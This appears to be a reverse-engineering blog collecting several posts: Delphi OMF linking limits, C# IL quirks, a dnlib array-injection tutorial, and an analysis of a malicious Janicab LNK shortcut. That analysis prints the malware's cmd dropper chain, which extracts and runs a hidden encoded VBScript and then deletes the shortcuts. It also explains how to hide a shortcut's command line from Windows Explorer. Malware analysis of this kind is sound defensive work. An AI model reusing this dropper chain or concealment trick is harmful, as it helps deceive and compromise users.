Linking OMF files with Delphi

kao

Continuing the discussion about Delphi compiler and the object files.

Here is the OMF file template I made for 010 Editor: https://www.mediafire.com/?bkpbkjvgen7ubz1
omf_parser

Please note, it is not a full-featured implementation of OMF specification. I only implemented all OMF file records that are processed by Delphi 2007 compiler. So, next time you have a cryptic compiler error while trying to link OMF file in Delphi, you can take a look into your OBJ file and make an educated guess what's causing the problem.

TL;DR version

In 95+% of cases you will encounter OBJ file that has unsupported segment name in SEGDEF record. And it's a simple fix, too - you just need to use objconv.exe by Agner Fog and use -nr option to rename the offending segment. Something like this:

objconv.exe input.obj -nr:BadSegmentName:DATA output.obj

Next possible issue is exceeding the number of EXTDEF or LNAMES records - this can happen if you're trying to convert a really large DLL file into OBJ file.

Finally, your OBJ file might contain some record type which is not supported by Delphi compiler at all. I'm not aware of a simple way to fix it, I would try using 010Editor and OMF template to remove the entire record.

If your problem is not caused from any of the above issues, please feel free to drop me a note - I'll be happy to look into it.

Known limitations of Delphi compiler

This is a list of limitations I was able to compile and/or confirm. Some of them come from Embarcadero official notes and the rest I obtained by analyzing dcc32.exe.

SEGDEF (98H, 99H)

  • Not more than 10 segments - if number of segments exceeds 10, buffer overrun will probably happen.
  • Segments must be 32bits. Will cause "E2215 16-Bit segment encountered in object file '%s'"
  • Segment name must be one of (case insensitive):
    • Code segments: "CODE", "CSEG", "_TEXT"
    • Constant data segments: "CONST", "_DATA"
    • Read-write data segments: "DATA", "DSEG", "_BSS"

    Segment with any other name will be ignored.

LNAMES (96H)

Not more than 50 local names in LNAMES records - will cause "E2045 Bad object file format: '%s'" error.

EXTDEF (8CH)

Not more than 255 external symbols - will cause "E2045 Bad object file format: '%s'"
Certain EXTDEF records can also cause "E2068 Illegal reference to symbol '%s' in object file '%s'" and "E2045 Bad object file format: '%s'"

PUBDEF (90H, 91H)

Can cause "E2045 Bad object file format: '%s'" and "F2084 Internal Error: %s%d"

LEDATA (A0H, A1H)

Embarcadero says that "LEDATA and LIDATA records must be in offset order" - I am not really sure what that means. Can cause "E2045 Bad object file format: '%s'"

LIDATA (A2H, A3H)

Embarcadero says that "LEDATA and LIDATA records must be in offset order" - I am not really sure what that means. Can cause "E2045 Bad object file format: '%s'"

FIXUPP (9CH)

This type of record is unsupported, will cause immediate error "E2103 16-Bit fixup encountered in object file '%s'"

FIXUPP (9DH)

Embarcadero documentation says:

  • No THREAD subrecords are supported in FIXU32 records
  • Only segment and self relative fixups
  • Target of a fixup must be a segment, a group or an EXTDEF

Again I'm not sure what they mean. But there are lots of checks that can cause "E2045 Bad object file format: '%s'"

THEADR (80H)

Accepted by compiler, but no real checks are performed.

LINNUM (94H, 95H)

Accepted by compiler, but no real checks are performed.

MODEND (8AH, 8BH)

Accepted by compiler, but no real checks are performed.

COMMENT (88H) and GRPDEF (9AH)

Ignored by compiler.

That's the end of the list. Any other entry type will cause immediate error "E2045 Bad object file format: '%s'" 🙂

Useful links

My OMF file template for 010Editor: https://www.mediafire.com/?bkpbkjvgen7ubz1
OMF file format specification.
The Borland Developer's Technical Guide
Objconv.exe by Agner Fog
Manual for objconv.exe

Weirdness of C# compiler

kao

I've been quite busy lately. I made OMF file template I promised few weeks ago, found a remote code execution vulnerability in One Big Company's product and spent some time breaking keygenme by li0nsar3c00l. I'll make a blog post about most of these findings sooner or later.

But today I want to show you something that made me go WTF..

I needed to see how the loop "while true do nothing" looks like in IL. Since C# compiler and .NET JIT compiler are quite smart and optimize code that's certainly an eternal loop, I needed to get creative:

using System;

static class Test
{
  static void bla(Int32 param)
  {
     while (param != 0) {};  // loop loop loop!
     Console.WriteLine("1");
  }

  static void Main()
  {
     bla(123);
  }
}

Nothing fancy, but C# & JIT compiler don't track param values, so they both generate proper code..

Well, I thought it's a proper code, until I looked at generated MSIL:

.method private hidebysig static void  bla(int32 param) cil managed
  {
    // Code size       28 (0x1c)
    .maxstack  2
    .locals init (bool V_0)
    IL_0000:  nop
    IL_0001:  br.s       IL_0005

    IL_0003:  nop
    IL_0004:  nop
    IL_0005:  ldarg.0
    IL_0006:  ldc.i4.0
    IL_0007:  ceq
    IL_0009:  ldc.i4.0
    IL_000a:  ceq
    IL_000c:  stloc.0
    IL_000d:  ldloc.0
    IL_000e:  brtrue.s   IL_0003

    IL_0010:  ldstr      "1"
    IL_0015:  call       void [mscorlib]System.Console::WriteLine(string)
    IL_001a:  nop
    IL_001b:  ret
  } // end of method Test::bla

WTF WTF WTF? Can anyone explain to me why there are 2 ceq instructions?

I could understand extra nop and stloc/ldloc instructions, but that ceq completely blows my mind.. And it's the same for .NET 2.0 and 4.5 compilers.

I won’t show you

kao

if you come to me with a question, i won’t give you an answer.

if you ask for my advice, i won’t give you a recommendation.

at best i’ll give you a pointer, a suggestion. perhaps a direction, a map. you’ll then start walking, creating your own route, getting lost and finding your way again. you’ll see other people’s footsteps often, some old and some fresh, and sometimes you’ll walk open territories no one has visited before. you’ll meet Eureka and dance together and laugh in joy, you’ll cry with Despair, which is not a bad thing.

if you want a lesson, i won’t give you instruction.

if you want guidance, but i won’t show you.

i want you to have fun too. i won’t spoil your journey.

or maybe i just have no idea and this is my fancy excuse to slip away from the situation?

Thank you, el trastero, couldn't have said it any better.

Excuse the mess #2

kao

I'm in the middle of updating the blog to the latest version of WordPress. It's not a really straightforward process as the new emoji support in WordPress 4.2 causes RSS feeds to stop validating. And there are lots of other tiny but ugly issues with it.

So, please excuse the mess, I'm doing my best to iron-out all the remaining wrinkles. 😉 And please let me know if you notice anything wrong with the site, comments or RSS.


Update: looks like all issues are resolved. Enjoy!

Analyzing malicious LNK file

kao

Last week I noticed a month-old post from F-Secure titled "Janicab Hides Behind Undocumented LNK Functionality" in my RSS Reader. I had starred it but never had time to read and analyze it thoroughly. Post title and their statement caught my attention:

But the most interesting part is the use of an undocumented method for hiding the command line argument string from Windows Explorer.

What is this undocumented functionality you're talking about? Tell me more! Unfortunately, they didn't provide any technical details just some screenshots.

I'm gonna fix that (and have some fun in process) 🙂

Initial findings and available tools (are crap)

Armed with information from FSecure's post, I started Googling. In a few minutes I found VirusTotal scan and a couple of searches later the LNK file itself. Now what?

I'm not a LNK file expert and I don't have magic tools for analyzing them. So, I did what everyone else would - Googled again. There are 3 tools that can be found easily:

All of these tools showed the same information as VirusTotal scan - absolutely nothing useful. See for yourself in screenshots:
lnk_template_original

Marked in blue is the final structure of LNK file, as per 010Editor Template. COMMAND_LINE_ARGUMENTS are empty. And it looks like malware authors somehow managed to put the real command-line "/c copy *.jpg.lnk..." outside the defined structures, right? How's that possible?

So, I got an official Shell Link (.LNK) Binary File Format specification by Microsoft and started reading.

Fixing 010Editor template

LNK file consists of sequence of structures of variable size. There's always size of the structure, followed by data. Right after it there's a next size and next data. Size, data, size, data.. It's very easy to process, just look at the size, read the appropriate number of bytes, process them. Repeat until done. How hard is that?

Yet, Mr. Stevens (proudly calling himself Microsoft MVP Consumer Security, CISSP, GSSP-C, MCSD .NET, MCSE/Security, MCITP Windows Server 2008, RHCT, CCNP Security, OSWP) managed to mess up his template.

lol

His implementation of LinkInfo structure looks like this:

typedef struct
{
	DWORD LinkInfoSize;
	DWORD LinkInfoHeaderSize;
	LinkInfoFlags sLinkInfoFlags;
	DWORD VolumeIDOffset;
	DWORD LocalBasePathOffset;
	DWORD CommonNetworkRelativeLinkOffset;
	DWORD CommonPathSuffixOffset;
	if (LinkInfoHeaderSize >= 0x00000024 )
	{
		DWORD LocalBasePathOffsetUnicode;
		DWORD CommonPathSuffixOffsetUnicode;
	}
	if (sLinkInfoFlags.VolumeIDAndLocalBasePath == 1)
	{
		VolumeID sVolumeID;
		string LocalBasePath;
		string CommonPathSuffix;
	}
	if (sLinkInfoFlags.CommonNetworkRelativeLinkAndPathSuffix == 1)
	{
		CommonNetworkRelativeLink sCommonNetworkRelativeLink;
	}
} LinkInfo;

He just reads all the fields one after another and expects that the length of all the fields will be equal to the size of structure (LinkInfoSize). Sure, it might work on "normal" LNK files but we're dealing with malware and intentionally modified files here. 😉

After fixing that and few more bugs in the template, I was able to see the proper structure of this LNK file:
lnk_template_fixed_overview
Command-line passed to cmd.exe is exactly where it should be, so why is Windows Explorer having problems with it?

Modifications in LNK file

Well, let's look at the file in more details.

lnk_template_lots_of_zeros_1
Looks like someone took a hex editor and just filled with zeroes every possible field in most of ItemID structures.

lnk_template_lots_of_zeros_2
Same in LinkInfo, lots of zeroes.

lnk_template_lots_of_zeros_3
And in EnvironmentDataBlock too..

lnk_template_lots_of_zeros_4
Hmm, this is interesting, 0xA0000000 is not a defined ExtraData structure ID according to MS spec.

Well, there are lots of changes but which one(-s) are causing the Explorer cockup F-Secure is mentioning? There are two ways to find it - debugging Windows Explorer shell, or making a test LNK file and filling it with zeroes until Explorer breaks. First one would be fun, but second one will be definitely faster. 😉

After few attempts, I found the culprit: it's the modified EnvironmentDataBlock.

So, now you know. Adding empty EnvironmentDataBlock to any shortcut and setting ShellLinkHeader.LinkFlags.HasExpString = 1 will cause Windows Explorer to hide your command-line (but not exe name) from the user. 😈

Command line magic and steganography

I wanted to finish my analysis but some things were still bugging me.
lnk_template_extra_data
What are these data after the end-of-file marker? And why is this LNK file 500+KB in size?

The answer is simple - it's using steganography to hide malicious VBScript inside.

Let's look at the commands passed to cmd.exe, I'll just prettify them a bit. To do it properly, you need to know about command prompt escape characters, like "^" (at first I didn't and FSecure got it wrong in their blogpost, too! 😉 ). These are the actual commands:

copy *.jpg.lnk %tmp%
%systemdrive%
cd %tmp%
dir /b /s *.jpg.lnk>o
echo set /p f=^<o>.bat
echo type "%f%"^>z9>>.bat
echo findstr /R /C:"#@~" z9^>1.vbe^&cscript 1.vbe^&del *.lnk /S /Q /Y>>.bat
.bat

First few lines are copying our LNK file to TEMP folder. Remember, FSecure analysis says that LNK file was originally called fotomama.jpg.lnk. 😉
dir command is printing full filename of our evil file into another file named "o".
echo lines are generating file .bat.
And finally .bat is executed.

So, what is being written into .bat?

set /p f=<o
type "%f%">z9
findstr /R /C:"#@~" z9>1.vbe&cscript 1.vbe&del *.lnk /S /Q /Y

First 2 lines just copy our evil file to z9. I really don't know why file copy is done via environment variables, maybe it's some sort of anti-antivirus trick to hide the malware origin.
findstr treats z9 as text file and copies all "lines" of text that contain "#@~" into a file 1.vbe. If you Google a bit, you'll learn that encrypted VBScript files have extension .vbe, consist of one long string and start with magic bytes "#@~^"".
Then a script gets executed, LNK file deleted and stupid user ends up being pwned. 🙂

Now, the bytes after end-of-file marker in LNK file start to make sense. 0x0A is new-line that's necessary for findstr, and then comes encrypted VBScript. Nice example of steganography, lots of black command-prompt scripting magic, I really like it! 😉

Decoding VBE file and analyzing it - that's a matter of another blog post. Yes, it's really on my todo list.

Fixed LNK Template

I spent few more evenings working on the LNK template. It was just bugging me, to have something so useful, yet so terribly broken. So, I'm happy to present a fully reworked version that should be much more stable and able to deal with malicious LNK files in much better fashion.

Download link: https://www.mediafire.com/?zvrlmjy9v9m3ed3

Final thoughts

This was a fun evening project. I learned a lot about 010Editor Binary Templates, learned something new about LNK files and got a refresher course in CMD scripting and steganography. Writing this post took much much more time than the actual research, though.

If you want to have some fun too, you can use my 010Editor Template to edit your LNK files. Or make a simple tool in C#. Or create a LNK obfuscation service webpage in PHP. Possibilities are endless! 🙂

Obviously I won't give out link to an actual malware (if Google is your friend, you can find it anyway) but here's a demo LNK file I put together just for fun: http://www.mediafire.com/?gmphyn0mkmmyuag

It's harmless, trust me! 😀

Useful links

FSecure post that started my adventure
Original LNK Template
Official LNK specification by Microsoft
Overview of LNK file data that are useful for computer forensics

Since you asked.. How to inject byte array using dnlib

kao

Quite often I receive random questions about dnlib from my friends. To be honest, I have no idea why they think I know the answers to life the universe and everything else. 🙂 So, in this series of posts I'll attempt to solve their problems - and hope that the solution helps someone else too.

So, today's question is:

We're trying to add a byte array to an assembly using dnlib. We wrote some code* but dnlib throws exception when saving modified assembly:
An unhandled exception of type 'dnlib.DotNet.Writer.ModuleWriterException' occurred in dnlib.dll
Additional information: Field System.Byte[] ::2026170854 (04000000) initial value size != size of field type

I gave the friend the standard answer - make a sample app, see how it looks and then implement it with dnlib. Seriously, how hard can it be? 🙂

Well, array initialization in .NET is anything but simple.

How arrays are initialized in C#

Note - the following explanation is shamelessly copied from "Maximizing .NET Performance" by Nick Wienholt. It's a very nice book but getting little outdated. You can Google for "Apress.Maximizing.Dot.NET.Performance.eBook-LiB", if interested.

Value type array initialization in C# can be achieved in two distinct ways—inline with the array variable declaration, and through set operations on each individual array element, as shown in the following snippet:

//inline
int[] arrInline = new int[]{0,1,2};

//set operation per element
int[] arrPerElement = new int[3];
arrPerElement[0] = 0;
arrPerElement[1] = 1;
arrPerElement[2] = 2;

For a value type array that is initialized inline and has more than three elements, the C# compiler in both .NET 1.0 and .NET 1.1 generates a type named <PrivateImplementationDetails> that is added to the assembly at the root namespace level. This type contains nested value types that reference the binary data needed to initialize the array, which is stored in a .data section of the PE file. At runtime, the System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray method is called to perform a memory copy of the data referenced by the <PrivateImplementationDetails> nested structure into the array's memory location. The direct memory copy is roughly twice as fast for the initialization of a 20-by-20 element array of 64-bit integers, and array initialization syntax is generally cleaner for the inline initialization case.

Say what? You can read the text 3 times and still be no wiser. So, let's make a small sample application and disassemble it.

How array initialization looks in MSIL

Let's start with sample app that does nothing.

using System;
class Program
{
    static byte[] bla = new byte[] {1,2,3,4,5};
    static void Main()
    {
    }
}

Compile without optimizations, and disassemble using ildasm. And even after removing all extra stuff, there's still a lot of code & metadata for such a simple thing. 🙂

.assembly hello {}

.class private auto ansi beforefieldinit Program extends [mscorlib]System.Object
{
  .field public static uint8[] bla

  .method private hidebysig specialname rtspecialname static void  .cctor() cil managed
  {
    ldc.i4.5
    newarr     [mscorlib]System.Byte
    dup
    ldtoken    field valuetype '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}'/'__StaticArrayInitTypeSize=5' '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}'::'$$method0x6000003-1'
    call       void [mscorlib]System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(class [mscorlib]System.Array, valuetype [mscorlib]System.RuntimeFieldHandle)
    stsfld     uint8[] Program::bla
    ret
  }
}

.data cil I_00002098 = bytearray (01 02 03 04 05) 

.class private auto ansi '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}' extends [mscorlib]System.Object
{
  .custom instance void [mscorlib]System.Runtime.CompilerServices.CompilerGeneratedAttribute::.ctor() = ( 01 00 00 00 ) 
  .class explicit ansi sealed nested private '__StaticArrayInitTypeSize=5' extends [mscorlib]System.ValueType
  {
    .pack 1
    .size 5
  }

  .field static assembly valuetype '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}'/'__StaticArrayInitTypeSize=5' '$$method0x6000003-1' at I_00002098
}

For one byte array that we declared, compiler created .data directive, 2 static fields, one class and one nested class. And it added a global static constructor. Yikes!

Implementing it in dnlib

Now that we know all the stuff that's required for an array, we can make a tool that will add byte array to an assembly of our choice. To make things simpler, I decided not to create a holder class (named <PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904} in the example) and put everything in global module instead.

Note - Since I'm not a .NET/dnlib wizard, I always do it one step at a time, make sure it works and then continue. So, my workflow looks like this: write a code that does X → compile and run it → disassemble the result → verify that result X matches the expected → fix the bugs and repeat. Only after I've tested one thing, I move to the next one.

It also helps to make small test program first. Once you know that your code works as intended, you can use it in a larger project. Debugging the entire ConfuserEx project just to find a small bug in modifications made by someone - it's not fun! So, step-by-step...

First, we need to add the class with layout. It's called '__StaticArrayInitTypeSize=5' in the example above. That's quite simple to do in dnlib:

ModuleDefMD mod = ModuleDefMD.Load(args[0]);
Importer importer = new Importer(mod);
ITypeDefOrRef valueTypeRef = importer.Import(typeof(System.ValueType));
TypeDef classWithLayout = new TypeDefUser("'__StaticArrayInitTypeSize=5'", valueTypeRef);
classWithLayout.Attributes |= TypeAttributes.Sealed | TypeAttributes.ExplicitLayout;
classWithLayout.ClassLayout = new ClassLayoutUser(1, 5);
mod.Types.Add(classWithLayout);

Now we need to add the static field with data, called '$$method0x6000003-1'.

FieldDef fieldWithRVA = new FieldDefUser("'$$method0x6000003-1'", new FieldSig(classWithLayout.ToTypeSig()), FieldAttributes.Static | FieldAttributes.Assembly | FieldAttributes.HasFieldRVA);
fieldWithRVA.InitialValue = new byte[] {1,2,3,4,5};
mod.GlobalType.Fields.Add(fieldWithRVA);

Once that is done, we can add our byte array field, called bla in the example.

ITypeDefOrRef byteArrayRef = importer.Import(typeof(System.Byte[]));
FieldDef fieldInjectedArray = new FieldDefUser("bla", new FieldSig(byteArrayRef.ToTypeSig()), FieldAttributes.Static | FieldAttributes.Public);
mod.GlobalType.Fields.Add(fieldInjectedArray);

That's it, we have all the fields. Now we need to add code to global .cctor to initialize the array properly.

ITypeDefOrRef systemByte = importer.Import(typeof(System.Byte));
ITypeDefOrRef runtimeHelpers = importer.Import(typeof(System.Runtime.CompilerServices.RuntimeHelpers));
IMethod initArray = importer.Import(typeof(System.Runtime.CompilerServices.RuntimeHelpers).GetMethod("InitializeArray", new Type[] { typeof(System.Array), typeof(System.RuntimeFieldHandle) }));

MethodDef cctor = mod.GlobalType.FindOrCreateStaticConstructor();
IList instrs = cctor.Body.Instructions;
instrs.Insert(0, new Instruction(OpCodes.Ldc_I4, 5));
instrs.Insert(1, new Instruction(OpCodes.Newarr, systemByte));
instrs.Insert(2, new Instruction(OpCodes.Dup));
instrs.Insert(3, new Instruction(OpCodes.Ldtoken, fieldWithRVA));
instrs.Insert(4, new Instruction(OpCodes.Call, initArray));
instrs.Insert(5, new Instruction(OpCodes.Stsfld, fieldInjectedArray));

And that's it! Simples!

Further reading

Commented demo code at Pastebin
Longer explanation how array initialization works in C#


Updates

Just to clarify - this is a sample code. It works for me but if it blows up in your project, it's your problem. And there always are some things that can be improved.

• Sometimes I'm overcomplicating things.. You don't need to explicitly import System.Byte, you can use mod.CorLibTypes.Byte for that.

instrs.Insert(1, new Instruction(OpCodes.Newarr, mod.CorLibTypes.Byte.ToTypeDefOrRef()));

SZArraySig is a cleaner but less obvious way to refer to any array. If you need to reference complex arrays, this is better:

FieldDef fieldInjectedArray = new FieldDefUser("bla", new FieldSig(new SZArraySig(mod.CorLibTypes.Byte)), FieldAttributes.Static | FieldAttributes.Public);
mod.GlobalType.Fields.Add(fieldInjectedArray);